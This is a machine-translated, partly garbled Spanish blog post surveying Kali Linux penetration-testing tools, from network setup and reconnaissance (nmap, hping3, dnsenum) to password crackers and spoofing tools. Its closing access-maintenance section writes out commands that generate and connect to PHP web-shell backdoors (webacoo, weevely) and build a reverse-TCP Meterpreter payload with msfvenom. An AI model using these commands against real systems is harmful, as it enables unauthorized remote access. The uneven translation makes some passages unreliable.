guía de pruebas de penetración y clasificación de conocimiento de kali-linux

Kali Linux Introducción e Introducción

1. Características principales de kali

Sitio web oficial de Kali: https://www.kali.org/
Distribución de Linux basada en Debian

Integrar más de 300 procedimientos de prueba de penetración.

Admite la mayoría de las tarjetas de red inalámbricas

2. Configuración del servicio de red

1. Establecer IP fija:

Archivo de configuración de red de máquina virtual

/etc/network/interfaces

Inserte la descripción de la imagen aquí

2. Comando de configuración de ip temporal
ifconfig eth0 192.168.43.100 netmask 255.255.255.0					//ip
route add default gw 192.168.43.1									//网关路由
systemctl restart networking.service								//重启网络恢复
3. El rol del comando dmesg:

Vea la información del hardware de la tarjeta de red inalámbrica, vea la información del búfer del anillo del núcleo
Inserte la descripción de la imagen aquí

4. Comandos para encender y apagar la red

Puede usar los comandos systemctl o service aquí. La sintaxis es básicamente la misma. La versión anterior de kali solo puede admitir el comando service.
Las sintaxis comunes son:

start			//开启
stop			//关闭
restart			//重启
5. Servicios de uso común en Kali

http (apache)

service apache2 start // Iniciar
service apache2 stop // Cerrar
service apache2 restart // Reiniciar
update-rc.d apache2 por defecto // Self-start

mysql

service mysql start // Iniciar
service mysql stop // Cerrar
service mysql restart // Reiniciar
update-rc.d mysql por defecto // Desde el inicio de
mysql -u root -p // Iniciar sesión

ssh

service ssh start // Iniciar
service ssh stop // Cerrar
service ssh restart // Reiniciar
update-rc.d valores predeterminados de ssh // Inicio automático

Inserte la descripción de la imagen aquí

3. Actualización del sistema

Comando
apt-get update
apt-get upgrate
apt-get dist-upgrade

PD: La última versión del Kali, que es la versión 2020, no es muy compatible, y muchas de mis herramientas de uso común han sido eliminadas. Personalmente, no recomiendo actualizar, excepto por necesidades.

aptcache search <包名>			//在软件仓库查找某个软件包的名称
apt-get install <包名>			//指定安装某个软件

Descripción general de las pruebas de penetración

1. Metodología de cinco marcos de prueba

开源安全测试方法论

信息系统安全评估框架

开放式web应用安全项目

web应用安全联合威胁人类

渗透测试执行标准

Segundo, el marco de prueba de penetración universal

范围界定

信息收集

目标识别

服务枚举

漏洞映射

社会工程学

漏洞利用

提升权限

访问维护

文档报告

Inserte la descripción de la imagen aquí

Pasos de implementación de pruebas de penetración

1. Recolección de información

Definición, uso y uso del comando whois

whois example.com
Este comando devolverá información detallada sobre el nombre de dominio del registrante del nombre de dominio example.com e información de contacto.
Sitio web oficial: https://who.is/

Inserte la descripción de la imagen aquí

Análisis de registros DNS
1. anfitrión
host www.example.com

Solo devuelve la dirección IP (ipv4) cuando no hay ningún parámetro

host -a www.example.com

Agregue el parámetro -a para devolver todos los registros dns

Inserte la descripción de la imagen aquí

2da excavación
dig example.com

Cuando no hay ningún parámetro, solo se devuelve la dirección de registro A (IPV4)

dig example.com any

Agregue el parámetro any para devolver todos los registros dns

Inserte la descripción de la imagen aquí

3. dnsenum
dnsenum example.com

De forma predeterminada, devolverá la información de la dirección IP de la dirección del host, el servidor de resolución de nombres y el servidor de correo.
Si tiene un diccionario, puede usar esta herramienta para
destruir el subdominio dnsenum -f dns.txt example.com

Inserte la descripción de la imagen aquí

4. dmitry
dmitry -iwnse targethost

Realizar consulta whois

Información de host de minería en el sitio web de Netcraft.com

Buscar todos los subdominios posibles

Buscar todas las direcciones de correo electrónico posibles

Inserte la descripción de la imagen aquí

dmitry targethost -f -b

Haga un escaneo de puerto simple (muy lento y no muy fácil de usar, no recomendado)

Inserte la descripción de la imagen aquí

Información de enrutamiento
1. tcptraceroute
tcptraceroute example.com

Se sabe que el servidor web de destino ha abierto el puerto 80 utilizando el protocolo TCP. Use el comando anterior para obtener información completa de enrutamiento de la máquina local al host de destino.

ps: bloqueado fácilmente por firewall

2. tctrace
tctrace -i eth0 -d example.com

Especifique la tarjeta de red eth0 para obtener información de enrutamiento entre esta máquina y example.com
Inserte la descripción de la imagen aquí

Reconocimiento de objetivos

Blog columnas penetración de herramientas de uso común pruebas - reconocimiento de la diana

1. ping
ping -c 10 example.com
ping -c 10 192.168.123.256

El parámetro -c especifica el número de paquetes enviados (tiempos de ejecución)

El parámetro -i especifica la dirección de origen o la interfaz de red (tarjeta de red)

-s especifica el tamaño del paquete (el tamaño predeterminado es 64 bytes)
Inserte la descripción de la imagen aquí

2. arping
arping 192.168.56.102 -c 1

Compruebe si el host en la LAN está en línea, el parámetro -i especifica la tarjeta de red, el parámetro -c especifica el número de veces

Inserte la descripción de la imagen aquí

3. fping
fping 192.168.1.1 192.168.1.100 192.168.1.107

Compruebe si los tres hosts están en línea

fping -g 192.168.56.0/24

Detecta todo el segmento de red

fping -r 1 -g 192.168.1.1 192.168.1.10

El parámetro -r especifica el número de reintentos, el valor predeterminado es 3

fping -s www.baidu.com www.cqcet.edu.cn www.csdn.net

-s parámetro para ver los resultados estadísticos de múltiples objetivos

Inserte la descripción de la imagen aquí

4. Hping3

Propósito principal

Probar las reglas del firewall

Prueba de sistema de detección de intrusos / IDS

Probar vulnerabilidades de seguridad en modo TCP / IP

hping3 -0 192.168.56.101  发送原始IP包(--raw-ip)
hping3 -1 192.168.56.101  发送ICMP包(--icmp)
hping3 -2 192.168.56.101  发送UDP包(--udp)
hping3 -8 192.168.56.101  进入扫描模式(--scan)
hping3 -9 192.168.56.101  进入监听模式(--listen)
5. nping
nping --tcp-connect -c 1 -p 22 192.168.56.102  基础的tcp-connect功能
nping --tcp -c 1 -p 22 192.168.6.102           TCP模式
nping --udp -c 1 -p 22 192.168.6.102           UDP模式
nping --icmp -c 1 -p 22 192.168.6.102          ICMP模式(默认模式)
nping --arp -c 1 -p 22 192.168.6.102           ARP/RARP模式
nping --tr -c 1 -p 22 192.168.6.102            traceroute模式
6. nbtscan
nbtscan 192.168.1.1-254

Busque el nombre NetBIOS de cada host en la LAN

nbtscan -hv 192.168.1.1-254

-hv parámetro para ver qué servicios se están ejecutando

Inserte la descripción de la imagen aquí

7. uniscan

Identificación del sistema operativo

1. p0f

Puede identificar los siguientes hosts

La máquina conectada a su host (modo SYN, el modo predeterminado)

Máquinas accesibles por el host (modo SYN + ACK)

Máquinas a las que el host no puede acceder (modo RST +)

Máquinas que pueden monitorear la comunicación de su red.

p0f -f /etc/p0f/p0f.fp -o p0f.log

Abra el puerto 80 para acceder a la máquina de destino
Inserte la descripción de la imagen aquí

2. nmap
nmap -O 192.168.43.89			//操作系统识别

La tasa de reconocimiento no es muy alta.
Inserte la descripción de la imagen aquí

Servicio de enumeración

Herramientas comunes para pruebas de penetración-enumeración de servicios amap

Escaneo de red

1. nmap

Función principal

Detección de host

Escaneo de puertos

Servicio / detección de versión

Detección del sistema operativo

Enrutamiento de red

Motor de script Nmap

nmap -sT 192.168.43.89							//TCP连接扫描
nmap -sS 192.168.43.89							//SYN扫描
nmap -sN 192.168.43.89 							//TCP NULL扫描
nmap -sF 192.168.43.89  						//TCP FIN扫描
nmap -sX 192.168.43.89  						//TCP XMAS扫描
nmap -sM 192.168.43.89  						//TCP Maimon扫描
nmap -sA 192.168.43.89  						//TCP ACK扫描
nmap -sW 192.168.43.89  						//TCP 窗口扫描
nmap -sI 192.168.43.89  						//TCP Idel扫描 
Opciones de escaneo
-p 端口范围 :只扫描指定的端口
-F (快速扫描):仅扫描100个常用端口
-r (顺序扫描):按照从小到大的顺序扫描端口
--top-ports <1 or greater> 扫描nmap-services里排名前N的端口
Opciones de puerto de destino

Salida interactiva (pantalla) La salida
normal (-oN) no muestra la información de tiempo de ejecución y la información de advertencia
Archivo XML (-oX) El archivo de formato XML generado se puede convertir en un archivo html, y también se puede analizar mediante la interfaz gráfica de usuario, que es fácil de importar a la base de datos
para que Grep lo use Archivos (-oG)

Opciones de salida

-T Especifica el modo de control de horario

Opciones de control de horario

nmap -sV 192.168.43.89 -p 22    				//服务版本识别
nmap -O  192.168.43.89          				//操作系统检测
nmap -Pn 192.168.43.89          				//禁用主机检测
nmap -A  192.168.43.89          				//综合扫描
Opciones comunes
-sC 或 --script = default         启动默认类NES脚本
--script <filename>|<category>|<directories>  根据指定的文件名、类别名、目录名,执行相应的脚本
--script-args<args>               给脚本指定参数
Motor de secuencias de comandos
-f 使用小数据包
--mtu 调整数据包的大小
-D    指定假IP
--source-port<portnumber>或-g  模拟源端口
--data-length 改变发送的数据包的默认长度
--max-parallelism  限制nmap并发扫描的最大连接数
--scan-delay<time>  控制发送探测数据的时间间隔

editar

2. Unicornscan

-m U detecta el protocolo UDP
-m T detecta el protocolo TCP

-Iv Ver salida detallada

-r Ajusta la velocidad de envío de paquetes

unicornscan -m U -Iv 192.168.43.89:1-65535 -r 10000
unicornscan -m T -Iv 192.168.43.89:1-65535 -r 10000

Inserte la descripción de la imagen aquí

Enumeración SMB

1. nbtscan
nbtscan 192.168.56.1-254

Busque el nombre NetBIOS de cada host en 192.168.56.0

nbtscan -hv 192.168.56.102

Ver el servicio de red de este host 192.168.56.102
Inserte la descripción de la imagen aquí

Enumeración SNMP

Una herramienta común para pruebas de penetración: ADMsnmp para análisis snmp

1. onesixtyone
onesixtyone 192.168.56.102

Cadena SNMP compatible con el host de búsqueda

onesixtyone -d 192.168.56.102

Realizar un escaneo más detallado

2. snmpcheck
snmpcheck -t 192.168.56.102

Recopilar información sobre dispositivos SNMP

Enumeración VPN

1. ike-scan
ike-scan -M -A -Pike-hashkey 192.168.0.10

Detecta, identifica y prueba un servidor VPN IPSec

-M divide la información de decodificación de la carga útil en varias líneas para facilitar la lectura

-Un modo agresivo de IKE

-P Guardar el valor hash del modo agresivo y la clave compartida como un archivo

Mapeo de vulnerabilidad

1. Tipos de vulnerabilidades

Vulnerabilidad local

Vulnerabilidad remota

En segundo lugar, el escáner de vulnerabilidades.

OpenVAS

Herramientas de análisis de Cisco

Herramienta de auditoría de Cisco (cat)

Ejecutar:

 cd /usr/share/
 CAT --help

Comandos:
-h especifica el nombre del host (use esta opción al escanear un solo host)
-w especifica el nombre del diccionario (para adivinar la cadena de la comunidad)
-a especifica la lista de contraseñas (para agotar la contraseña)
-i y [ioshist] (verifique el IOS Errores que han aparecido en la historia)

Inserte la descripción de la imagen aquí

Cisco Global Exploiter (cge)

Ejecutar:

 cd /usr/bin/
 cge.pl

Comando

cge.pl 10.200.213.25 3

Inserte la descripción de la imagen aquí

El tercer tipo de prueba

WebCrack

Herramienta de análisis FUZZ (difusa)

CAMA (continuará)

JBroFuzz ​​(continuará)

3. Herramienta de análisis SMB

ImpacketSamrdump

(Continuará)

4. herramienta de análisis SNMP

SNMP Walk

(Continuará)

5. Herramientas de análisis de programas web.

Herramientas de evaluación de bases de datos

DBPwAudit (continuará)

sqlmap

SQL Ninja (continuará)

Herramienta de evaluación de aplicaciones web

Burpsuite (continuará)

nadie

Proxy Paros (continuará)

W3af (continuará)

WafW00f (continuará)

Webscarab (continuará)

Explotar

MSFConsole
MSFConsole_ Módulos de uso común
MSFConsole_Post-Infiltration Module

Elevación de autoridad

1. Clasificación

Elevación vertical

Elevación horizontal de derechos

Segundo, el uso de vulnerabilidades locales.

3. Ataque de contraseña

Basado en el conocimiento
Basado en todos
Basado en funciones
Ataque fuera de línea
Ataque en línea

algoritmo hash de juicio hash-idntifire: solo use el algoritmo hash utilizado por el sistema bajo prueba para descifrar la contraseña

Descifrado de contraseñas multiproceso de Hashcat, utilizando completamente la CPU

RainbowCrack usa la mesa arcoiris para romper e intercambiar espacio por tiempo

samdump2 descifra la contraseña de la cuenta del sistema de Windows

John descifró el hash y el tipo de cripta DES es excelente.

Versión gráfica de Johnny John.

Crunch crea un diccionario de contraseñas que puede usarse para descifrar la fuerza bruta

Tipo de Ophcrack LM / NTML basado en la tabla del arco iris

Herramienta de craqueo en línea

El modo de rastreador CeWL es una herramienta para recopilar palabras en una URL especificada y poner las palabras recopiladas en un diccionario para mejorar la tasa de aciertos

Hydra crack contraseña en línea

Medusa crack contraseña en línea

4. herramientas de suplantación de identidad en Internet

Sniffing de red y spoofing de red

DNSchef

Respuesta de DNS al host probado para el servidor DNS, resuelva el nombre de dominio a la IP controlada por el atacante, de modo que el host del atacante desempeñe el papel de servidor real

arpspoof

Herramienta práctica para ayudar a la supervisión de la red en la conmutación de red.

Ettercap

Herramientas para ataques man-in-the-middle en LAN

Cinco, sniffer de red

Dsniff

tcpdump

Wireshark

Mantenimiento de acceso

Primero, la puerta trasera del sistema operativo

Cymothoa

Intersecarse

Medidor preter

Segundo, la herramienta de túnel

dns2tcp
yodo
ncat
proxychains
ptunnel
conmocionado
sslh
stunnel4

Tres, crea una puerta trasera web

WeBaCoo

Comando:
-g crear código de puerta trasera
-f función php requerida para puerta trasera: sistema (predeterminado) / shell_exec / exec / passthru / popen
-o genera el nombre del archivo del programa de puerta trasera especificado generado
Ejemplo:

webacoo -g -o test.php  使用默认配置生成php后门程序
webacoo -t -u http://192.168.43.89/test.php

Conectarse a la puerta trasera
Inserte la descripción de la imagen aquí

cada semana

Genere una puerta trasera PHP ofuscada y guarde la puerta trasera como display.php

weevely generate password display.php
weevely http://192.168.43.89/display.php password

Acceda a la shell web del host bajo prueba

Inserte la descripción de la imagen aquí

PHP Meterpreter

-p especifica la carga útil como php / meterpreter / reverse_tcp

-f Establecer formato de salida

lhost es la dirección del atacante
lport es el puerto del atacante

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.180 LPORT=1234 -f raw > a.php

Inserte la descripción de la imagen aquí

Inserte la descripción de la imagen aquí

Publicado 71 artículos originales · Me gustó 17 · Visitas 6689

Supongo que te gusta

Origin blog.csdn.net/qq_38626043/article/details/105366375
Recomendado
Clasificación